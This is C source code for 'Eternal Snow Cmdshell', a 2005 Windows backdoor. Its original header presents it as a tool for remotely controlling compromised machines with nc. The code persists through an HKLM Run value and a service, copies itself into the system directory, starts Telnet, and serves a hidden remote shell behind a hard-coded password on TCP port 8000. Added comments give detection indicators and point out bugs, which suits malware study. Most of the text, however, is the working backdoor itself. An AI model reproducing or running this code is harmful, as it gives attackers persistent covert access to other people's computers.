/*
Delphiscn Eternal Snow Cmdshell Version 1.0
This backdoor was written by Delphiscn. It supports Windows NT/2000/XP/2003.
You can use nc to control a remote computer that is running this software.
Compiled and tested on Windows XP SP2 CN; NOT TESTED on 2000/2003.
Cannot run on Windows 98/ME.
Details
Eternal Snow will create a service (Workstations) on the remote system and bind the service computer on port 8000.
Then it will also try to start the Telnet service on the remote system, where NT supports it.
An attacker can control it if he knows the password --Neverland.
References
1.msdn
2.www.xFocus.org
More Information
Delphiscn@www.EvilOctal.com
cnBlater(at)hotmail(dot)com
http://spaces.msn.com/members/delphiscn
2005-08-15*/
#include<winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsvc.h>
#include <Psapi.h>
#pragma comment( lib,"Psapi.lib")
#pragma comment(lib, "ws2_32.lib")
/* Hard-coded shared secret. main() searches the first data received from a
   connecting client for this string (strstr), so the literal is present in
   the compiled binary and usable as a static signature. */
#define password "Neverland"
/* Forward declarations for the routines defined in this file. */
BOOL reg(char *szExecFile);   // writes the HKLM ...\Run autostart value
void OnCreate();              // attempts to register the "WorkStations" service
void StartTelnet();           // attempts to start the service opened by the name "Telnet"
void Help();                  // prints the banner to the local console
/*
reg: registry autostart (persistence) step.
Opens HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ with KEY_ALL_ACCESS,
queries the value "Dlls", and when that query does not succeed writes a REG_SZ
value named "Kernels" whose data is szExecFile.
  szExecFile - NUL-terminated path stored as the value data.
  returns    - false if the key cannot be opened or the value cannot be written,
               true otherwise.
Detection note: the artefact left behind is the "Kernels" value under the HKLM Run key.
*/
BOOL reg(char *szExecFile)
{
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\";
// KEY_ALL_ACCESS on an HKLM key; the open fails for callers without that access.
long snow0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(snow0!=ERROR_SUCCESS) return(false);
// 80-byte scratch buffer for the query below; the malloc result is not checked.
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
// NOTE(review): the value queried is "Dlls" but the value written is "Kernels",
// so "Kernels" is (re)written on every run unless a "Dlls" value exists.
long snow1=::RegQueryValueEx(hKEY,"Dlls", 0,&dwType, username_Get,&cbData_1);
if(snow1!=ERROR_SUCCESS)
{
DWORD setsize;
// Data size includes the terminating NUL.
setsize=strlen(szExecFile)+1;
dwType=REG_SZ;
long snow3=::RegSetValueEx(hKEY,"Kernels", 0, dwType, (const unsigned char*) szExecFile, setsize);
// This early return skips the free() and RegCloseKey() below.
if(snow3!=ERROR_SUCCESS) {return(false);}
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);
}
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
/*
Thanks to Sunlion[E.S.T]

Enables or disables one named privilege in the current process token.
  lpszPrivilegeName - privilege name passed to LookupPrivilegeValue
                      (callers in this file pass SE_DEBUG_NAME).
  bEnable           - TRUE sets SE_PRIVILEGE_ENABLED, FALSE clears the attribute.
  returns           - 0 when the token cannot be opened AND when the function runs
                      to the end; 1 only when the privilege name lookup fails.
                      The return value therefore does not tell a caller whether
                      the privilege was actually adjusted.
*/
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0;
// This return path does not close hToken.
if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
// The result of AdjustTokenPrivileges is not examined.
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return 0;
}
/* Writes the three-line banner to stdout. The strings contain no conversion
   specifiers, so they are emitted verbatim; they are also present in the
   binary as plain literals. */
void Help()
{
    static const char *const bannerLines[] = {
        "Eternal Sonw Cmdshell in Windows NT System Support For 2000/XP/2003 Version 1.0\n",
        "CODE BY Delphiscn@www.EvilOctal.com E-mail:cnBlaster(at)hotmail(dot)com\n",
        "Complied in Windows XP SP2 CN 2005-08"
    };
    const int lineCount = sizeof(bannerLines) / sizeof(bannerLines[0]);
    for (int idx = 0; idx < lineCount; ++idx)
    {
        fputs(bannerLines[idx], stdout);
    }
}
/*
main: analyst walk-through of the program flow.
 1. Copies its own image to <system directory>\Kernels.exe.
 2. Calls reg() (HKLM Run value), OnCreate() (service registration attempt) and
    StartTelnet().
 3. Listens on TCP port 8000 on all interfaces and accepts ONE connection.
 4. Sends a banner and a password prompt, then looks for the hard-coded
    password in the client's first message.
 5. Creates two anonymous pipes, starts a hidden child process with its
    standard handles on those pipes, and relays bytes between the pipes and
    the socket until either side fails.
Host and network artefacts visible in this function: the file
<system directory>\Kernels.exe, a listener on TCP/8000, and the literal
banner/prompt strings sent to the client.
*/
int main(int argc,char *argv[])
{
// Overwrites the argv[0] buffer with the module path, passing 255 as its size;
// the real size of the argv[0] buffer is not known here.
GetModuleFileName(NULL,argv[0],255);
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe");
// When not already running from the target path, copy the image there;
// FALSE (bFailIfExists) means an existing file is overwritten.
if( strcmp(argv[0],szNewPlace) != 0 )
{CopyFile(argv[0],szNewPlace,FALSE);}
// Exit if the Run-key step reports failure.
if(!reg(szNewPlace))
{return 0;}
OnCreate();
StartTelnet();
system("cls.exe");
Help();
WSADATA wsaData;
// Shared buffer for the password exchange and the relay loop; not initialised.
char buff[4096];
int Eternal;
if ((Eternal = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup Failed: %d\n",Eternal);
return -1;
}
// Fixed listening port.
int port=8000;
int RemoteServer,LocalClient;
struct sockaddr_in addrServer,addrClient;
// Literal strings sent to the client; usable as content signatures.
char *MSG="\n\r Welcome Hacker";
char *getpass="\r\n Your Password is:";
char *passok="\r\n ok";
char *error="\r\n Error Password Please Try it again";
RemoteServer=socket(AF_INET,SOCK_STREAM,0);
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(port);
// ADDR_ANY: the listener is bound on every local interface.
addrServer.sin_addr.s_addr=ADDR_ANY;
// Winsock SO_RCVTIMEO is expressed in milliseconds.
int TimeOut=50000;
setsockopt(RemoteServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
UINT bReUser=1;
setsockopt(RemoteServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
// The results of socket(), bind() and listen() are not checked.
bind(RemoteServer,(struct sockaddr*)&addrServer,sizeof(addrServer));
listen(RemoteServer,5);
printf("Bind Server is OK\n%d",port);
int iLen=sizeof(addrClient);
// Single accept(): there is no loop around it, so the process serves one client.
LocalClient=accept(RemoteServer,(struct sockaddr*)&addrClient,&iLen);
if (LocalClient != INVALID_SOCKET)
{
int iTimeOut=50000;
setsockopt(LocalClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
}
else return -1;
send(LocalClient,MSG,strlen(MSG),0);
send(LocalClient,getpass,strlen(getpass),0);
// The recv() result is discarded and buff is not NUL-terminated before the
// strstr() below, which is a substring search rather than an exact comparison.
recv(LocalClient,buff,1024,0);
if(!(strstr(buff,password)))
{
send(LocalClient, error, strlen(error), 0);
printf("\r\n PassWord ERROR!");
closesocket(LocalClient);
// NOTE(review): no return here; execution continues below with a socket that
// has already been closed.
}
send(LocalClient, passok, strlen(passok), 0);
// Pipe pair 1 carries the child's stdout/stderr; pipe pair 2 feeds its stdin.
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
// Hard-coded structure length instead of sizeof(sa).
sa.nLength=12;
sa.lpSecurityDescriptor=0;
// Pipe handles are inheritable so the child process can use them.
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
STARTUPINFO siinfo;
// The child command line names "Kernels.exe", the same file name as the copy
// made at the top of main(), not a command interpreter.
char cmdLine[] = "Kernels.exe";
PROCESS_INFORMATION ProcessInformation;
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
// Child window is hidden.
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;
printf("\r\n Pipe Create OK!");
// bInheritHandles is 1; the result stored in bread is never read.
int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
// Relay loop: polls the child's output pipe with no wait between iterations.
while(1)
{
int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
// Child produced output: read it and forward it to the client.
ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret = send(LocalClient,buff,lBytesRead,0);
if(ret <= 0) break;
}
else
{
// No child output pending: block on the socket and forward client bytes to
// the child's stdin. lBytesRead is unsigned, so the <= 0 test is true only
// for 0.
lBytesRead = recv(LocalClient,buff,1024,0);
if(lBytesRead <= 0) break;
ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
}
}
// Only the sockets are closed; pipe and process handles are left to process exit.
closesocket(LocalClient);
closesocket(RemoteServer);
return 0;
}
/*
OnCreate: service-registration (persistence) attempt.
Builds <system directory>\Kernels.exe, enables SE_DEBUG_NAME, opens the local
service control manager with SC_MANAGER_ALL_ACCESS and calls CreateService with
the service name and display name "WorkStations".
Detection note: a service named "WorkStations" is the artefact this routine
aims to leave.
NOTE(review): SERVICE_WIN32_OWN_PROCESS and SERVICE_INTERACTIVE_PROCESS are
passed as two separate arguments, so the arguments after them may not line up
with the parameters the author intended. Confirm on a sample whether the
service is actually registered before relying on it as an indicator.
*/
void OnCreate()
{
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe");
// Return value ignored.
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
scv=::CreateService(scm,
"WorkStations",
"WorkStations",
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szNewPlace,
NULL,NULL,NULL,NULL);
if (scv!=NULL)
{
// Success path closes only the service handle; scm stays open.
::CloseServiceHandle(scv);
}
else
{
// Failure path closes only the SCM handle.
::CloseServiceHandle(scm);
}
}
}
/*
StartTelnet: enables SE_DEBUG_NAME, opens the local service control manager
with SC_MANAGER_ALL_ACCESS, opens the service named "Telnet" with
SERVICE_ALL_ACCESS and asks for it to be started. Every failure is silent.
Detection note: an unexpected start of the Telnet service around the same time
as the other artefacts from this file is a correlating signal.
*/
void StartTelnet()
{
// Return value ignored.
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
{
scv=::OpenService(scm,"Telnet",SERVICE_ALL_ACCESS);
if (scv!=NULL)
{
// No service arguments are passed; the StartService result is not checked.
::StartService(scv,0,NULL);
::CloseServiceHandle(scv);
}
::CloseServiceHandle(scm);
}
}
/*
Compiled with Visual C++.Net
Good Luck ^.^
*/